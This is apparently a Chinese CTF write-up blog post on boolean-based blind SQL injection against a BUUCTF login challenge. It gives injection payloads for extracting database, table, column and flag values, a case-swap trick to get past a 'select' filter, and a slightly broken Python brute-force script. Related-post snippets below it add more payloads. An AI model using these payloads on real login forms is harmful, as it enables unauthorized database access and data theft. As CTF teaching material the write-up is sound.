bool注入

最新推荐文章于 2024-05-12 07:41:20 发布
最新推荐文章于 2024-05-12 07:41:20 发布
阅读量803 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/114803725
版权

sql注入-布尔盲注

以buuctf上的题具体来说
题目链接
方法一:布尔注入
方法二:报错注入

解题:

首先查看源代码:可以得到提示:得到一种思路:报错注入
在这里插入图片描述
这里拿布尔注入具体来说:
首先拿Bp判断:

  1. 输入name=admin &pass=1时:urldecode解码得到密码错误在这里插入图片描述
  2. name=1’or 1=1 # &pass=1 得到与1相同结果
  3. name=1’or 1=2 # &pass=1得到是字符型注入在这里插入图片描述
    解释: 第一句是admin用户名是对的,密码不对 和第二局相对照 :因为是字符型注入 所以1=1逃逸or 后面语句得到执行 用户名绕过 也验证三 :结果是不正确 =>可以利用字符型布尔注入来判断

这里有个坑就是select 被替换过滤了->应该用到str_replace(‘select’,’ ',sql语句)函数
这里用了大小写绕过

执行代码:

  1. 查询数据库名的语句:
1'or substr(database(),%d,1 )='%c'#
  1. 查询数据库的表明:
1'or substr((seLEct table_name from information_schema.tables where table_schema='note' limit %d,1),%d,1 )='%c'#
  1. 查询数据库的列名
1'or substr((seLEct column_name from information_schema.columns where table_name='fl4g' limit %d,1),%d,1 )='%c'#
  1. 查flag
1'or substr((seLEct flag from fl4g),%d,1)='%c'#

主干代码: 思想:利用报错信息回显判断字符是否正确

r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"

import requests
a= {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"}
url='http://d0bd929f-bbec-4a43-8b93-c0934de8d5a6.node3.buuoj.cn/login.php'
sql="1'or substr((seLEct flag from fl4g),%d,1)='%c'#"
for i in range(0, 8):
    for j in dict:
        data = {
            'name': sql0%(i,j),
            'pass': 's'
        }
        r = requests.post(url=url, data=data)

        if (r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text):
            print(j, end='')
print('-------------')

学习产出:

利用post 得到回显信息进行布尔注入

Rgylin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bool_injection
02-13
布尔注入 考点 bool注入,通过页面返回的结果判断是否存在注入 启动 通过docker-compose启动 docker-compose up -d open http://127.0.0.1:8304 通过docker run启动 docker run -d -P print1n/bool_injection 版权 如果名义,请联系作者删除( )
SQL注入之布尔式(boolean)注入
2301_79299101的博客
09-22 354
输入1' and if(substring(database(),1,1)='d',1,0)--+输入1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法 ,其他信息也是一样。输入 vince'and'1'='1。再输入 vince'and'1'='2。2,判断是数字式还是字符型。3,判断数据库有多少个字段。
sql注入bool盲注
最新发布
banliyaoguai的博客
05-12 559
二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。首先选择数组中间的数字和需要查找的目标值比较如果相等最好,就可以直接返回答案了如果不相等如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除。
Web安全原理剖析(三)——Boolean注入攻击
热门推荐
Phantom03167的博客
09-08 1万+
Boolean注入攻击
mysql bool注入,SQL注入【七】——Boolean注入
weixin_39862097的博客
03-23 385
基本注入流程有些人以为布尔盲注就是页面或者返回结果数据包中带有yes或者no,其实这种说法不正确0x01 判断注入点类型数字型字符型如果是字符型还得通过闭合,具体可以查看我之前的文章数字型和字符型0x02 获取数据库库名1. 判断当前数据库库名长度length():判断字符长度利用and length(database())不断去构造条件,如:and length(database())>1...
SQL注入漏洞 | bool
weixin_52116519的博客
11-28 668
SQL注入漏洞 | iwebsecSQL注入漏洞 | 数字型参考文章文章所涉及的脚本代码,可以自己动手敲一次,增进理解,形成自己的SQl注入脚本,以后可以不断复用。
综合bool盲注脚本.py
07-15
可以适用于部分SQL注入题目
bool商城框架
04-21
8. **依赖注入**:bool框架实现了依赖注入,允许开发者在运行时动态注入依赖,增强了代码的灵活性和可测试性。 9. **API开发**:bool框架对RESTful API设计有很好的支持,方便构建前后端分离的应用,同时兼容移动...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP...超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
bool商城代码+笔记+流程图
09-21
6. 错误处理和安全:良好的错误处理机制能确保系统稳定运行,而安全措施如SQL注入防护、XSS防御、CSRF预防等则保护了系统的安全性。 7. RESTful API设计:如果bool商城支持API接口,那么理解RESTful API设计原则,...
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)
mooyuan的博客
11-26 2595
iwebsec靶场的SQL注入漏洞的第03关bool注入漏洞渗透,通过源码再来分析下布尔型SQL注入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字型(2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的布尔型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入
lifeng_dc的博客
01-22 1136
一、解题过程 (一)观察payload与结果 1.SQL执行有结果,就输出welcome to iwebsec!!! 2.否则输出1 (二)编写脚本逐项获取信息 1.获取数据库名字符串长度 先要为python安装requests包 pip install requests python代码如下: #encoding=utf-8 import requests import os url="http://192.168.182.130:8001/sqli/03.php" def DbLen():
【ctf】布尔型注入
chualam的博客
11-03 307
步骤:猜数据库名字长度--猜数据库名字 --猜表单数量--猜表单名字长度 --猜表单名字--猜字段数量--猜字段长度--猜字段 1 and length(database())>3 1 and mid(database(),1,1)='a' //用substr函数也行 1 and ascii(substr((select database()),1,1))='数字' 1 and left(database(),4)='sqli' //判断字符串 1 and 1=((select count.
sql注入练习之bool盲注
windStudyer的专栏
05-22 1135
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6236
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
SQL注入Bool盲注(510cms)
qq_45775897的博客
01-05 2954
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
SQL注入-布尔型盲注
qq_65240014的博客
07-26 573
关于sql注入的略微进阶一点的文章,介绍关于bool型盲注的方法
多次--使用bool注入和报错注入
qq_32642035的博客
03-17 208
查数据库名 查到数据库名长度为9 查到数据库名为web1002-1 import requests from time import time import re url="http://123.206.87.240:9004/1ndex.php?id=0" a="0123456789qwertyuiopasdfghjklzxcvbnm!@#$%^&*()_" out="" for i i...
SQL注入原理及实践(一)–SQL注入之布尔型盲注入
dulirongdudu的博客
08-02 2137
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔型盲注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
超级SQL注入工具V1.1使用详解:渗透测试利器
工具支持多种注入方式,包括Bool型盲注、错误显示注入和Union注入,并兼容多种数据库系统,如Access、MySQL、SQLServer、Oracle等。此外,它还具备独特的多字节编码字符处理能力,可以在盲注环境中获取各国语言数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值